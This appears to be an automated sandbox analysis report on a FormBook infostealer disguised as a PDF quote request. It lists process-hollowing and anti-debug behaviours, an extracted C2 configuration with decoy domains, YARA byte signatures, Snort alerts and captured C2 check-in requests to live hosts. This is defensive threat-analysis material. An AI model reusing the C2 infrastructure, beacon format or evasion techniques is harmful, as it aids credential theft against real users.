Loading ...

Play interactive tourEdit tour

Analysis Report RFQ_AP65425652_032421 isu-isu,pdf.exe

Overview

General Information

Sample Name:RFQ_AP65425652_032421 isu-isu,pdf.exe
Analysis ID:383968
MD5:98f9ea244308bb5969ea3c302c32efcd
SHA1:82a913894418af7834d23bc543eb286230d4edf4
SHA256:cd292d4cdb5ff8f2de087a09de2a152722d910f1df7ce7b65e6480be9ae77fdf
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6788 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
    • RFQ_AP65425652_032421 isu-isu,pdf.exe (PID: 6848 cmdline: 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: 98F9EA244308BB5969EA3C302C32EFCD)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5128 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6316 cmdline: /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.luegomusic.com/pe0r/"], "decoy": ["quickeasybites.com", "idilecup.com", "atelierdusalon.com", "tigerking-safe.com", "goinyourstrength.com", "ssfgasia.com", "halmanseger.com", "hpcovn.com", "thegodfatherricedealer.com", "hzmsbg.com", "trickswithwix.com", "rbvctiu.com", "spystoredevices.com", "monlexiem.com", "apt-forward.com", "medsez.cloud", "nanantz.com", "kf350.com", "ztvwgqjya.com", "countingeverything.com", "motion-mill-tv.com", "mex33.info", "desertfoxindustries.com", "welchmanlongbow.com", "beachnovotel.com", "basicchan.com", "boekhoudingwetteren.com", "pierresplayhouse.com", "xitiefilm.com", "betterskindays.com", "hdeamutfak.com", "sqjqw4.com", "coloradocouponclub.com", "leadershipcodes.com", "simplysouthdisinfecting.net", "lideresdeimmunocal.com", "tipsaglik.com", "greaterluxuryrehab.info", "tennesseewheelrepair.com", "5150shoshone.com", "slot-782.com", "cubitia.net", "fudweisj.icu", "forguyshere.com", "connect-alert-status.network", "hannahkaylewis.com", "soarcredits.com", "queensindustrial.com", "kudzuentertains.com", "maconhemorrhoidcenter.com", "1364kensington.com", "prestamosa.com", "lifeisgoingwells.com", "cloverunner.com", "4608capaydrive.com", "neomily.xyz", "blushingdevil.com", "essentials-trading.com", "theinfoinsider.com", "heftylefties.com", "zea-px16z.net", "thecapitalhut.com", "rootedwithlovejax.com", "nesreenibrahimmd.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dllReversingLabs: Detection: 22%
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeVirustotal: Detection: 35%Perma Link
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeJoe Sandbox ML: detected
          Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.4ca7960.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.control.exe.a0a460.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RFQ_AP65425652_032421 isu-isu,pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.646395751.000000001EF20000.00000004.00000001.sdmp, RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.691829468.0000000000ABF000.00000040.00000001.sdmp, control.exe, 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ_AP65425652_032421 isu-isu,pdf.exe, control.exe
          Source: Binary string: control.pdbUGP source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692305154.0000000002620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.668908847.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 162.241.244.61:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 107.178.142.156:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49772 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49774 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.luegomusic.com/pe0r/
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.1364kensington.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.luegomusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.kf350.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.pierresplayhouse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.thecapitalhut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.ssfgasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.desertfoxindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.tennesseewheelrepair.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 HTTP/1.1Host: www.rootedwithlovejax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.1364kensington.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:22:07 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: http://business.google.com/
          Source: control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmpString found in binary or memory: http://business.google.com/website/rooted-with-love/pe0r/
